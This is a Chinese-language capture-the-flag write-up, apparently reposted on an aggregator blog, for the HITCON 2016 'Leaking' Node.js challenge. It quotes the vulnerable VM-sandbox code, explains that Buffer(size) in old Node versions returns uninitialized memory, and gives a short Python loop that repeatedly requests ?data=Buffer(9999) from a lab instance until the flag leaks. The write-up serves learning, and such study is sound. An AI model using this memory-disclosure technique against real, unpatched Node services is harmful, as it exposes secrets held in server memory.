[HITCON 2016]Leaking

最近想學下nodejs相關(guān)的題目，所以去buu上又找了一道來做

進入題目后如上圖所示，直接給出了源代碼，老樣子，拿出之前收藏的nodejs相關(guān)安全問題來對比著看看,我發(fā)現(xiàn)這里用了VM沙箱，那最有可能考的就是VM逃逸了

emem由于之前沒做過，說實話，光看這個完全不知道該怎么做，還是老實找個大佬的WP來看看吧

那我們先來分析下代碼，下面這段代碼是整道題的核心

/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")

首先是這一段，看注釋也能知道，這里生成了flag

if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));

接下來是這一段，對我們傳入data參數(shù)的值進行判斷長度是否小于等于12，如果符合則會放到沙箱里去執(zhí)行，這里可以用數(shù)組繞過

這里就得說說這道題的考點了，這里涉及到的是nodejs的遠古內(nèi)存分配問題，nodejs在遠古版本（Node.js v5.4.1/v4.2.4）中的Buffer分配是就著以前用過的內(nèi)存分配的，并且分配完了還不會初始化一下，也就意味著之前加載進內(nèi)存然后被回收掉的內(nèi)存位置可能被再次分配出來，并且還不會被初始化，原始數(shù)據(jù)還保留在那。這位外國老哥在這里分析了原理

所以如果使用new Buffer(size)或其別名Buffer(size)）創(chuàng)建,則對象不會填充零,而只要是調(diào)用過的變量，一定會存在內(nèi)存中，所以需要使用Buffer()來讀取內(nèi)存，使用data=Buffer(9999)分配一個9999的單位為8位字節(jié)的buffer，因此很容易得到姿勢

這里寫個腳本

import requestssession = requests.Session() session.trust_env = False while True:response = session.get('http://24225844-3e1f-469b-b6bc-343124db15d5.node4.buuoj.cn:81/?data=Buffer(9999)')if "flag" in response.text:print(response.text)break

最后再提一下這題的考點

在較早一點的 node 版本中 (8.0 之前)，當 Buffer 的構(gòu)造函數(shù)傳入數(shù)字時, 會得到與數(shù)字長度一致的一個 Buffer，并且這個 Buffer 是未清零的。8.0 之后的版本可以通過另一個函數(shù) Buffer.allocUnsafe(size) 來獲得未清空的內(nèi)存。

參考文章：
https://y4tacker.blog.csdn.net/article/details/114003419?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-5.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-5.control
https://blog.z3ratu1.cn/%E5%88%B7%E9%A2%98%E5%88%B7%E9%A2%98.html

總結(jié)

以上是生活随笔為你收集整理的[HITCON 2016]Leaking-nodejsVM沙箱逃逸的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。